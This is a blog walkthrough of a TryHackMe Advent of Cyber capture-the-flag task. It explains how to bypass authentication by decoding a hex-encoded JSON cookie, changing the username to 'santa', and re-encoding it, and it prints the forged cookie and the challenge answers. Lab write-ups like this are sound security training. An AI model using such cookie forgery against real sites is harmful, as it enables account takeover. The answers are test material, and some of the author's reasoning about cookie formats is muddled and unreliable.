• Donald Ashdown

THM, Advent of Cyber2, Web Exploitation - Task 6

Updated: Jun 25, 2021

This room covers authentication cookies, encoding formats, cookie manipulation.


Task 6 Web Exploitation A Christmas Crisis


-Elf McSkidy

"The Best Festival Company's brand new OpenVPN server has been hacked. This is a crisis!

The attacker has damaged various aspects of the company infrastructure -- including using the Christmas Control Centre to shut off the assembly line!

It's only 24 days until Christmas, and that line has to be operational or there won't be any presents! You have to hack your way back into Santa's account (blast that hacker changing the password!) and getting the assembly line up and running again, or Christmas will be ruined!"



What is the name of the cookie used for authentication?


We browse to the Christmas Carol centre to get started on reclaiming Santa's hacked website.




We register an account here and login. The aim of this task is to determine the cookie used for authentication. If you are using FireFox, upon logging in, the cookie can be viewed within the Storage tab where you will see the answer is Auth.



In what format is the value of this cookie encoded?


I know from experience that the cookie value is represented in Hexadecimal. But in order to confirm this, we can copy the cookie value into CyberChef and use the decode function to read the cookie in plain text. The answer is Hexadecimal.



Having decoded the cookie, what format is the data stored in?


This question calls upon experience and I know that majority of websites use java script and therefore cookies are also stored in JavaScript. But if you are ever unsure you can check under the debugger tab in FireFox and reference the existing page scripts and their language. The answer is JSON.

Figure out how to bypass the authentication. What is the value of Santa's cookie?


We need to bypass the login page by manipulating the cookies. The cookie has two fields,

{"company":"The Best Festival Company", "username":"SantaC"}

We need to change the stored cookie and have this passed to the web server to verify as true and serve up the administrative page. So instead of my chosen name we are going to put in "santa" as the username in the cookie.


This is possible as the web server keeps the session open with out browser and references the cookie that is stored client side. So if the server receives a request with a cookie that has the username santa the webserver thinks it is generating a request on behalf of santa.


So we have to rebuild the cookie in plain text, and re-encode it to hexadecimal. Make sure that the output delimiter string is set to none.


Refreshing the page provides us santa or "Administrative" capabilities to change the control console.


The answer is {"company":"The Best Festival Company", "username":"santa"}

7b22636f6d70616e79223a22546865204265737420466573746976616c20436f6d70616e79222c2022757365726e616d65223a2273616e7461227d


Now that you are the santa user, you can re-activate the assembly line! What is the flag you're given when the line is fully active?




66 views0 comments